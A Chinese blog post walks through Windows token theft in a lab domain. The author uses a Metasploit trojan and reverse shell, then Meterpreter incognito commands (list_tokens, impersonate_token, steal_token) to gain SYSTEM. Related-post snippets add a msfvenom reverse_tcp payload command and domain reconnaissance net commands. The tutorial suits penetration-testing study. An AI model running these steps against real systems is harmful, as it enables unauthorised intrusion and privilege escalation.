内网域的token使用

最新推荐文章于 2023-02-06 17:49:05 发布
最新推荐文章于 2023-02-06 17:49:05 发布
阅读量751 收藏
点赞数 1
分类专栏: 内网 后渗透 文章标签: 网络安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bring_coco/article/details/125840012
版权

一种是直接使用incognito.exe工具
另一种则是使用msf,这里讲解下msf的incognito利用
在kali上先生成一个木马
在这里插入图片描述
然后放到12server1上
在这里插入图片描述
然后在kali上开启监听
在这里插入图片描述
在12server1上启动木马
在这里插入图片描述
成功反弹shell
使用我们的incognito模块
命令:
use incognito #加载incognito
list_tokens -u #列出AccessToken
在这里插入图片描述
可以看到成功输出token,但其实是有域内用户test的,那么我们用域用户test重新登陆一下12server1,再注销登录本地administrators
但是还是没有,待询问

接着来吧
我们利用system系统的token来登录系统用户
命令:
getuid #查看当前token
impersonate_token “NT AUTHORITY\SYSTEM” #模拟system用户,getsystem即可实现该命令,如果要模拟其他用户,将token名改为其他用户即可
在这里插入图片描述
在这里插入图片描述
使用这个命令即可回到本地用户,也就是之前的token
除了这种方法我们还能从进程中窃取token,首先使用ps命令列出进程,查看进程用户使用steal_token pid窃取令牌就有对应的权限
在这里插入图片描述
比如窃取这个进程,从而达到NT AUTHORITY\SYSTEM
在这里插入图片描述
可以成为了系统system权限,当然有时候会显示权限不够
完结

番茄酱料
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MSF内网渗透实战
hackzkaq的博客
05-17 3815
零基础学黑客,搜索公众号:白帽子左一 作者:掌控安全-小熊保安 本来还是想用cobalt strike,但是由于某些原因,暂时关闭了cobalt strike的服务器,正好用msf尝试做一次内网渗透熟悉熟悉,注:最初用蚁剑看了一下,此次目标主机没开杀软,所以以下内容不涉及免杀. 一、MSF生成木马上线目标 1. 生成木马 使用命令: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=XXX.XXX.XXX.XX LPORT=4444 -f ex
内网渗透文档过程有截图
07-02
内网渗透文档过程 本资源总结了内网渗透测试的整个过程,从设置虚拟机网络环境到生成 payload 并进行渗透测试。下面是本资源中所涉及的知识点: 1. 虚拟机网络环境设置:在 VMware 中设置虚拟机网络环境,使用...
Windos 内网渗透之Token使用
qq_53742230的博客
07-31 562
windows 内网渗透中Token的运用
Token一般存放在哪里
wufaqidong1的博客
08-15 1万+
CSRF:跨站请求伪造,简单的说,是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己曾经认证过的网站并运行一些操作(如:发邮件、发信息、甚至财产操作如转账和购买商品)。这利用了web中用户身份验证的一个漏洞:简单的身份验证职能保证请求发自某个用户的浏览器,却不能保证请求本身是用户自愿发出去的。这些类型的XSS攻击可以得到每个人的Web存储来访问你的网站。支持localStorage的一派则认为:撇开localStorage的各种优点不谈,如果做好适当的XSS防护,收益是远大于风险的。...
Token
kuyuguoheqi的博客
08-17 1395
而HTTP是无状态的协议。token的意思是“令牌”,是用户身份的验证方式,最简单的token组成:uid(用户唯一的身份标识)、time(当前时间的时间戳)、sign(签名,由token的前几位+盐以哈希算法压缩成一定长的十六进制字符串,可以防止恶意第三方拼接token请求服务器)。· 数据存储大小不同:单个Cookie 保存的数据不能超过4K,一个站点最多保存20个Cookie ,Session对象没有对存储的数据量的限制,其中可以保存更为复杂的数据类型,根据服务器大小来定。...
手把手教你如何查找Token
热门推荐
m0_52767002的博客
07-07 4万+
如何查找Token
内网渗透篇
weixin_45808483的博客
02-28 1943
信息搜集命令 1.查询当前环境 whoami && ipconfig /all 2.查询当前用户 net user /domain 3.查询控 net time 4.查询工作组 net group /domain 5.查询管理用户 net group "domain admins" /domain 6.查询有几台控制器 需要权限 net group "Domain controllers" 7.查找...
星云mib 信息
06-01
这些信息对于使用星云设备的管理员来说极其重要,因为它们允许管理员使用SNMP工具收集和分析设备的运行数据,从而实现自动化管理和故障预警。 使用星云MIB信息,你可以做到以下几点: 1. 监控设备状态:...
内网渗透思维导图指北
10-04
内网渗透思维导图指北
账号管理工具
12-21
账号管理工具,管理网账号网账号管理工具,管理网账号网账号管理工具,管理网账号网账号管理工具,管理网账号
domainTools:内网渗透小工具
03-20
我的C ++学习过程-编写的渗透小工具 0x01。 NetLocalGroupGetMembers 功能:查询目标服务器本地管理组的成员 0x02。 NetLocalGroupEnum 功能:返回指定服务器上的所有本地组 0x03。 NetGroupGetUsers ...
token的作用及实现原理
蜗牛小前的博客
11-27 1026
1:首先,先了解一下request和session的区别 request 指在一次请求的全过程中有效,即从http请求到服务器处理结束,返回响应的整个过程,存放在HttpServletRequest对象中。在这个过程中可以使用forward方式跳转多个jsp。在这些页面里你都可以使用这个变量。request是用户请求访问的当前组件,以及和当前web组件共享同一用户请求的web组件。如:被请求的j...
内网渗透之Token令牌窃取
qq_44029310的博客
08-05 2436
本文包括:令牌的基本概念和种类,以及在windows靶场环境下访问令牌的窃取利用。
【Metasploit】MSF常用命令
m0_62783065的博客
02-06 1834
【Metasploit】MSF常用命令
如何获取变量token的值
海淀码农
10-29 2万+
一.什么是token 1.客户端使用用户名跟密码请求登录 2.服务端收到请求,去验证用户名与密码 3.验证成功后,服务端会签发一个 Token,再把这个 Token 发送给客户端 4.客户端收到 Token 以后可以把它存储起来,比如放在 Cookie 里或者 LocalStorage 里,客户端每次向服务端请求资源的时候需要带着服务端签发的 Token 5.服务端收到请求,然后去验证客户端请求里面带着的 Token,如果验证成功,就向客户端返回请求的数据 6.web/APP登录的时候发送加密的用户名和密码
渗透之令牌窃取
good good study
05-26 1795
用户登录计算机后会生成随机的访问令牌(秘钥),这个令牌会在用户每次的进程操作中不断拷贝,所以能够识别某进程属于某用户。即令牌相当于用户的身份证令牌在系统重启后清除程序/进程能够访问到什么系统资源,取决于进程拿着谁的令牌。所以可以通过伪造令牌的方式能伪造该令牌的所属用户。
基于token的登录认证
weixin_36852235的博客
07-22 3824
最近新做移动端项目,h5的页面嵌入app中,信息userinfo的获取,页面与app的协议传递,联调的很心累啊。Token知识点一直是自己想要深入了解,这周就想了解下这个知识点,顺便对自己这周的工作做个总结。性能上报,还需要抽时间来学习。废话不多说,go ~ 目的:客户端和服务器端进行通信,进行用户认证。   优势: 支持跨访问: Cookie是不允许垮访问的,这一点对Token机制是...
Incognito v2.0 Released
weixin_34351321的博客
09-10 688
2019独角兽企业重金招聘Python工程师标准>>> ...
内网控信息需要收集哪些
最新发布
03-31
1.名(Domain Name) 2.控制器IP地址(Domain Controller IP Address) 3.管理员账户信息(Domain Administrator Account Information) 4.控制器操作系统信息(Domain Controller Operating System Information) 5.用户账户信息(Domain User Account Information) 6.组账户信息(Domain Group Account Information) 7.策略信息(Domain Policy Information) 8.安全事件日志(Domain Security Event Logs) 9.用户登录日志(Domain User Login Logs) 10.组成员信息(Domain Group Member Information) 11.计算机信息(Domain Computer Information) 12.名服务器信息(Domain Name Server Information) 13.控制器配置信息(Domain Controller Configuration Information) 14.控制器远程访问日志(Domain Controller Remote Access Logs) 15.控制器备份和恢复信息(Domain Controller Backup and Recovery Information)

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值